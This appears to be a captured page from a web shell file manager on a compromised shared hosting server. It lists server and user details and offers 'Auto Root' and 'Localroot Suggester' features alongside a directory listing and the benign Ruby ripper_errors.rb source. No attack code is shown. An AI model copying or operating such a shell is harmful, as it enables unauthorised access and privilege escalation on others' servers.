Linux premium71.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.80
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ruby /
syntax_suggest /
Delete
Unzip
Name
Size
Permission
Date
Action
capture
[ DIR ]
drwxr-xr-x
2025-05-13 10:35
api.rb
5.16
KB
-rw-r--r--
2025-04-24 07:53
around_block_scan.rb
6.9
KB
-rw-r--r--
2025-04-24 07:53
block_expand.rb
4.87
KB
-rw-r--r--
2025-04-24 07:53
capture_code_context.rb
6.67
KB
-rw-r--r--
2025-04-24 07:53
clean_document.rb
8.74
KB
-rw-r--r--
2025-04-24 07:53
cli.rb
3.12
KB
-rw-r--r--
2025-04-24 07:53
code_block.rb
2.13
KB
-rw-r--r--
2025-04-24 07:53
code_frontier.rb
5.62
KB
-rw-r--r--
2025-04-24 07:53
code_line.rb
6.46
KB
-rw-r--r--
2025-04-24 07:53
code_search.rb
3.82
KB
-rw-r--r--
2025-04-24 07:53
core_ext.rb
3
KB
-rw-r--r--
2025-04-24 07:53
display_code_with_line_numbers.rb
1.77
KB
-rw-r--r--
2025-04-24 07:53
display_invalid_blocks.rb
1.75
KB
-rw-r--r--
2025-04-24 07:53
explain_syntax.rb
2.41
KB
-rw-r--r--
2025-04-24 07:53
left_right_lex_count.rb
4.06
KB
-rw-r--r--
2025-04-24 07:53
lex_all.rb
1.12
KB
-rw-r--r--
2025-04-24 07:53
lex_value.rb
1.5
KB
-rw-r--r--
2025-04-24 07:53
parse_blocks_from_indent_line.rb
1.5
KB
-rw-r--r--
2025-04-24 07:53
pathname_from_message.rb
1.42
KB
-rw-r--r--
2025-04-24 07:53
priority_engulf_queue.rb
1.26
KB
-rw-r--r--
2025-04-24 07:53
priority_queue.rb
2
KB
-rw-r--r--
2025-04-24 07:53
ripper_errors.rb
837
B
-rw-r--r--
2025-04-24 07:53
scan_history.rb
2.92
KB
-rw-r--r--
2025-04-24 07:53
unvisited_lines.rb
705
B
-rw-r--r--
2025-04-24 07:53
version.rb
76
B
-rw-r--r--
2025-04-24 07:53
Save
Rename
# frozen_string_literal: true module SyntaxSuggest # Capture parse errors from ripper # # Example: # # puts RipperErrors.new(" def foo").call.errors # # => ["syntax error, unexpected end-of-input, expecting ';' or '\\n'"] class RipperErrors < Ripper attr_reader :errors # Comes from ripper, called # on every parse error, msg # is a string def on_parse_error(msg) @errors ||= [] @errors << msg end alias_method :on_alias_error, :on_parse_error alias_method :on_assign_error, :on_parse_error alias_method :on_class_name_error, :on_parse_error alias_method :on_param_error, :on_parse_error alias_method :compile_error, :on_parse_error def call @run_once ||= begin @errors = [] parse true end self end end end